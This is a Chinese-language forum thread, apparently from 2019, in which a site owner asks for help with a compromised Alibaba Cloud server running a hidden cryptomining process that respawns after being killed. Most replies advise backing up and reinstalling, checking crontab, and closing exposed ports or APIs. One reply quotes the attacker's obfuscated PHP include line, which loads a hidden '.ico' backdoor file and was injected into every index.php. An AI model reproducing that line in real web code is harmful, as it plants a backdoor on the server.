实在没办法了,找了阿里云的技术支持还是搞不定,希望大家帮忙 看看 top 的占用
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2162 www-data 20 0 44796 2628 468 S 51.8 0.3 1:02.34 xxq6862
1
CivAx 2019-01-30 10:25:00 +08:00
既然被跑满了,又能抓到 PID,为啥不直接 kill -9 ?
|
2
liuchang8877 OP 没用的,有定时任务应该,kill 掉后还是会重启
已经从参考这个做了,还是不行,没找到它的定时任务 https://blog.csdn.net/zzf1510711060/article/details/83015700 |
3
ThirdFlame 2019-01-30 10:28:50 +08:00
/etc/crontab 查看一下
|
4
westoy 2019-01-30 10:28:50 +08:00 1
先找个做安全的查查系统日志和程序日志, 看看是怎么被日的
再把数据和程序备份下, 如果问题出在程序上, 修正之 重做系统 重新导入数据和安装程序 不要试图现在这个系统修修补补继续用, 搞这个的都后多重后手防止被杀的, 你查二三重马的成本比重做高多了 |
5
PureWhiteWu 2019-01-30 10:30:02 +08:00
直接重装系统啊。。。。
|
6
egen 2019-01-30 10:30:52 +08:00
既然可以放个挖坑就不能顺手放个后门?清空重来吧,不然真过年了
|
7
CivAx 2019-01-30 10:31:27 +08:00
@liuchang8877 #2 要不你给一下登录信息我帮你上去看看吧……(正好摸鱼
|
8
AstroProfundis 2019-01-30 10:33:29 +08:00 1
备份数据
开一台新的 ecs 部署干净环境 改强密码 /证书登录&检查应用的安全漏洞 导入备份的数据 改访问(域名、ip 之类)地址 旧 ecs 关机,观察没问题之后销毁旧 ecs |
9
zhoulouzi 2019-01-30 10:34:41 +08:00
不清楚 Aliyun ECS 怎么跑的, 但是类似之前 kubernetes 有一个 CVE-2018-1002105 的 API 安全漏洞,也是会被远程攻击,在容器里跑挖矿程序, 你可以相同思路看看你的 docker 的 API 是不是未授权就暴露出来了
|
10
liuchang8877 OP 哎,不想清空从来呀就是,成本有点高,三套程序,加上 https 证书什么的,一弄就是一天,阿里云上都做了快照,数据再备份下,郁闷。
|
11
liuchang8877 OP 这是什么玩法?每个目录下给我塞了一个 index.php 文件,引入了一个远程库?
<?php /*fb6ae*/ @include "\057var\057www\057htm\154/mo\144ule\163/im\141ge/\164est\163/.2\066a24\067ab.\151co"; /*fb6ae*/ |
12
msg7086 2019-01-30 10:47:44 +08:00
备份数据重装不就得了。清理病毒什么的就不要多想了……
|
13
liuchang8877 OP 只能重装了,奋战....
|
14
goodryb 2019-01-30 12:17:40 +08:00
如果由之前的快照,直接回滚之前的快照即可。
如果之前没有快照,建议对现在系统做手动快照。完成后重置系统,然后部署基础环境,挂载前面创建的快照,把数据拷贝过去。 快照是个好东西,一定要开起来 |
15
ccc008 2019-01-30 12:37:50 +08:00
@liuchang8877 #10 你慢慢分析查杀病毒。1 天都搞不定的。
|
16
cpdyj0 2019-01-30 12:44:09 +08:00 via Android
备份文件,重装系统…最简单粗暴但却有效的办法…
|
17
DANG 2019-01-30 12:49:53 +08:00
proc 下根据 pid 找文件路径删文件杀进程
crontab 里看定时任务里有没有脚本网址,有的话下载下来看看都干啥了。然后删除任务。 这种攻击都是服务器有漏洞导致的,建议关闭类似 8088 这样的危险端口。最主要的还是找到计划任务的那个脚本 |
18
yuikns 2019-01-30 12:49:56 +08:00
人家不仅能装 crontab,还能给你装各种启动和后台,还能篡改你的系统命令。
还是重装吧。 |
19
jay4497 2019-01-30 13:53:28 +08:00 1
|
20
liuchang8877 OP @jay4497
多谢,我给这个也删了试试 |
21
RubyJack 2019-01-31 09:49:08 +08:00
根除或者 cgroup 限制
|